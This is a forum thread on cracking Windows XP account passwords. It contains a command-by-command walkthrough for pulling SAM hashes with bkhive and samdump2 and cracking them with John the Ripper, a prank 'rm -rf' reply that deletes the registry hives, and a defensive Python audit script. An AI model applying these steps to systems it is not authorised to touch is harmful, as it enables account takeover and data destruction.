Help with cracking windows xp password
I have the entire contents of the windows/system32/config/ folder on a flash drive. I watched the tutorial and it didn't help much. Can anyone help? Thanks!
rm -rf /windows/system32/config/
This is for testing purposes only on our local domain. Replace as necessary.
For you, mount /mnt/*usb*
run samdump2 and dump it to /*usb*
brute it or rainbow it.
If you copy/pasted the system32 to a flash drive it won't work. fyi
What if I copied the system32\config\ folder with the Auditor live CD? I didn't do it through Windows, if that makes a difference.
Where are the rainbow tables located when I install BackTrack on my HDD? Thanks
I tried the WinXP passwd crack for fun and got some output I don't really understand.
With john -show hashes.txt it said that one of 8 hashes has been cracked.
Can someone enlighten me please?
Windows password cracking.
To explain kirmet's question: the Windows password is stored in the SAM database (local Windows accounts, not domain!) with the LAN Manager hashing algorithm as well as the newer NTLM hashing algorithm.
The LM hash is old; it was used for Windows 3.1, 95, 98 etc. You do not need it anymore, in fact I would advise that you switch it off with either a registry change or through local security policies.
The LM hash is insecure because it takes your password and immediately converts it to UPPERCASE. This removes any case sensitivity you had. It then splits your password into two 7 character passwords, padding out the second to make 7 characters. e.g.
It then hashes (one-way encryption) the two passwords separately...
PASSHAV = 7713c9168576a5ff
e58 = 194db5b7f19c8340
It then concatenates them...
And that is stored in the SAM database along with the NTLM hash...
The NTLM hash is stronger as it hashes the password with case sensitivity and can accept up to 254 characters (I think!).
Now that the revision is out of the way, to answer your question...
John The Ripper has broken the second half of the LM hash - e58 and not the first. Did you do a brute force attack or a dictionary attack? The advantage of doing a dictionary attack is that it is very quick, just a couple of minutes to get through a decent sized dictionary, but the password HAS to exist in the dictionary file. The advantage of a brute force is that you will get the password eventually, but it may take a long time.
Now, the rest.
In Back|Track (I'll show you the syntax with Back|Track instead of Auditor/Whax as it is the latest)
First off, boot your Windows machine with the Back|Track CD.
It should automatically mount the windows partition, if not...
root@slax:/# mkdir /mnt/win
root@slax:/# mount /dev/hda1 /mnt/win
root@slax:/# cd /mnt/win/WINDOWS/System32/config
root@slax:/# cp SAM /tmp
root@slax:/# cp system /tmp
That copies the two required files - SAM and system to the /tmp directory. Now you need to prepare the dictionary file.
root@slax:/# cd /pentest/password/dictionaries/
root@slax:/# gunzip -c wordlist.txt.Z > /tmp/wordlist.txt
root@slax:/# cd /tmp
Now you need to decrypt the SAM file...
root@slax:/# bkhive system key
Now extract the SAM file contents to a text file.
root@slax:/# samdump2 SAM key > hashes.txt
Now run John to break the passwords.
root@slax:/# john -w=wordlist.txt hashes.txt
By default it attacks the LM hash, but you can force it to the NTLM hash.
root@slax:/# john -w=wordlist.txt -f=NT hashes.txt
If the password appears in the dictionary file, then john will crack it quickly. If not, then you will have to carry out a brute force attack. (Rainbow tables are another very effective option, but Back|Track does not have any tables inbuilt as they are HUGE!)
I have made a shockwave flash tutorial on local windows password cracking with Back|Track, but have nowhere to put it for people to download.
Hope this helps you.
*two thumbs up for that awesome explanation*
Well, I did a dictionary attack first and a brute force after that - the E58 part was broken with the dictionary attack - but I stopped the brute force after some time.
So (sorry, but I can't remember exactly what the output said) when it said something like
...testing key ASAMDDR - ASAEERR
the algorithm tries to crack the first and the second 7-char set of the password?
Glad you liked my explanation. I teach pen testing for a living so I should be able to explain it!! ;-)
That message at the end of John basically tells you that it is running through the possible combinations of the passwords.
Do you still want to crack the password? If you post it, I'll crack it with rainbow tables. Preferably post the samdump2 output.
You should be able to run through all the possible combinations in about 3 days for a brute force attack against a LM hash.
Hi, I tried this on my machine (Dell XPS Gen2) and when I got to the command line # samdump2 SAM key > hashes.txt it came up with
No password for user Administrator (500)
No password for user Guest (501)
I carried on with the rest of the commands with the result of
No password hashes loaded
I was wondering why mine is not doing what it is meant to.
Other than that thanks for the great tutorial.
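Two things in this thread can be checked directly from a samdump2/pwdump-style line without cracking anything: the split of the LM hash into two independently hashed 7-character halves explained above, and the "No password for user" / "No password hashes loaded" result in the last post, which is what you see when the stored hashes are the well-known constants for an empty password. The following audit script is an added example written for this page, not part of any post or of the samdump2/John tools; the dump it parses is constructed, and every hash in it is a placeholder except the two published empty-hash constants.

```python
import re

# DES("KGS!@#$%") under an all-zero 7-byte key: the LM hash of an empty half.
# As the second half only, it means the password is at most 7 characters;
# as both halves, no LM hash is stored (LM disabled, blank, or > 14 chars).
LM_EMPTY_HALF = "aad3b435b51404ee"
# MD4 of the empty UTF-16LE string: the NT hash of a blank password.
NT_EMPTY = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump/samdump2 line layout: user:rid:lmhash:nthash:::
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


def classify(line):
    """Return (user, rid, findings) for one dump line, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    user, rid = m.group(1), int(m.group(2))
    lm, nt = m.group(3).lower(), m.group(4).lower()
    findings = []
    if nt == NT_EMPTY:
        findings.append("blank password")
    if lm == LM_EMPTY_HALF * 2:
        findings.append("no LM hash stored")
    else:
        findings.append("LM hash stored (attackable as two 7-char halves)")
        if lm[16:] == LM_EMPTY_HALF:
            findings.append("password is 7 characters or fewer")
    return user, rid, findings


def audit(dump_text):
    """Classify every parseable line of a dump; returns {user: findings}."""
    report = {}
    for line in dump_text.splitlines():
        parsed = classify(line)
        if parsed:
            report[parsed[0]] = parsed[2]
    return report


# Constructed sample dump (hypothetical accounts, placeholder hash values).
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
kirmet:1003:0123456789abcdefaad3b435b51404ee:00112233445566778899aabbccddeeff:::
longpw:1004:0123456789abcdef0123456789abcdef:00112233445566778899aabbccddeeff:::
"""

if __name__ == "__main__":
    for user, findings in audit(SAMPLE).items():
        print(f"{user}: {', '.join(findings)}")
```

On a real dump the same check tells you, before any cracking, which accounts still store an LM hash and which of those have short passwords, which is the state you want to fix via the NoLMHash policy mentioned in the explanation above.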